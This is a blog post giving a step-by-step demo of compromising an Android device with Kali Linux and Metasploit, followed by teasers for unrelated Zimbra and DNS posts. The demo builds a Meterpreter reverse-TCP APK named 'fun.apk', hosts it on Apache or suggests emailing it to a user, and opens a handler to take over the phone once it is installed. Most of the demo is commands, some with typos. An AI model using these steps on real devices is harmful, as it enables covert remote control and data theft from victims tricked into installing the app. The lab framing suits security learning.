Skip to main content

Demo for Mobile (Andriod) App Hacking using Kali Linux and Metasploit Framework


What is Kali Linux ? 

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.


What is Metasploit Framework ? 

The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.

Please follow the below for the Testing of Andriod Mobile  using Vulnerable Mobile App (Using Metasploit Framework)

1. Install the KALI LINUX in Virtual BOX/VMWARE


2. Install the Andriod OS in Virtual Box  from https://www.osboxes.org/android-x86/


Android-x86 4.4-r4 (download this Version)
3.Please follow the below for the Testing of Andriod using App (Using Metasploit Framework)


4. Create the MALWARE for Andriod


#msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.50.21-o /root/fun.apk


5. Share the app to user/Mobile Phone  using apache or Email.


#start apache2 start
#start postgresql start

Borwse the IP to verify the Web server is Running

Create the Folder in /var/www/html/fun/

Copy the file fun.apk to /var/www/html/fun/


6. In the Kali VM Start the postgresql by using 

# service postgresql start
#msfconsole
msf>set payload andriod/meterpreter/reverse_tcp
msf exploit(handle)>set LHOST 192.168.50.21(KALI VM IP ADDRESS)
msf .....>show options
msf......> exploit -j z

(We need to Wait for Andriod Device to install APK)

Browse the Website /fun/ & Install fun.apk
In andriod go to Download and install apk See the permission


Go to Kali Linux We will see the session is there

>sessions -i 1
>help
(It will show the commands)
>ifconfig
>ps
>ls







Comments

Popular posts from this blog

Password Expiry notification for the users in zimbra 8.x within 7 Days for the email users

This Script will run as cron tab daily basis and it will alert the users for whom password is going to expire within 7 days. It will also alert admin for the users for whom password expired. Kindly replace the domain.com with your own domain name and the  /opt/zimbra/postfix-2.10.3.2z/sbin/sendmail  path to the actual path of postfix #!/bin/bash #Script for zimbra password expiry email notification. # Meant to be performed as daily cronjob run as zimbra user.  # redirect output to a file to get a 'log file' of sorts. # Time taken of script; echo "$SECONDS Started on: $(date)" # Set variables: # First notification in days, then last warning: FIRST="7" LAST="3" # pass expiry in days, we are assuming passwd exiry is 150 Days POLICY="150" # Sent from: FROM="admin@domain.com" # Get all users - it should run once only. USERS=$(ionice -c3 /opt/zimbra/bin/zmprov -l gaa domain.com) #Todays date, in seconds: DATE...

SCRIPT TO SHOW INVALID LOGIN ATTEMPTS IN RED COLOR AND VALID LOGIN IN GREEN COLOR FOR ZIMBRA 8.x

Create a File by using #vi /usr/bin/watchaudit with the following contents  tail -f /opt/zimbra/log/audit.log | awk '   /INFO/ {print "\033[32m" $0 "\033[39m"}   /WARN/ {print "\033[31m" $0 "\033[39m"} ' Close and Save the File. Run the Watchaudit File in SSH Console . #chmod +x /usr/bin/watchaudit #/usr/bin/watchaudit

How DNS Works ? How Query works -Recursive and Iterative Queries for DNS Server

How DNS Works ? A DNS domain name is used in a program on the local computer. The request is then passed to the DNS Client service for resolution using locally cached information. If the queried name can be resolved, the query is answered and the process is completed. The local resolver cache can include name information obtained from two possible sources: If a Hosts file is configured locally, any host name-to-address mappings from that file are preloaded into the cache when the DNS Client service is started. For linux /unix the file is # vi /etc/hosts For windows :   c:\Windows\System32\drivers\etc The file is hosts Resource records obtained in answered responses from previous DNS queries are added to the cache and kept for a period of time. If the query does not match an entry in the cache, the resolution process continues with the client querying a DNS server to resolve the name. The cache can be cleared using the comm...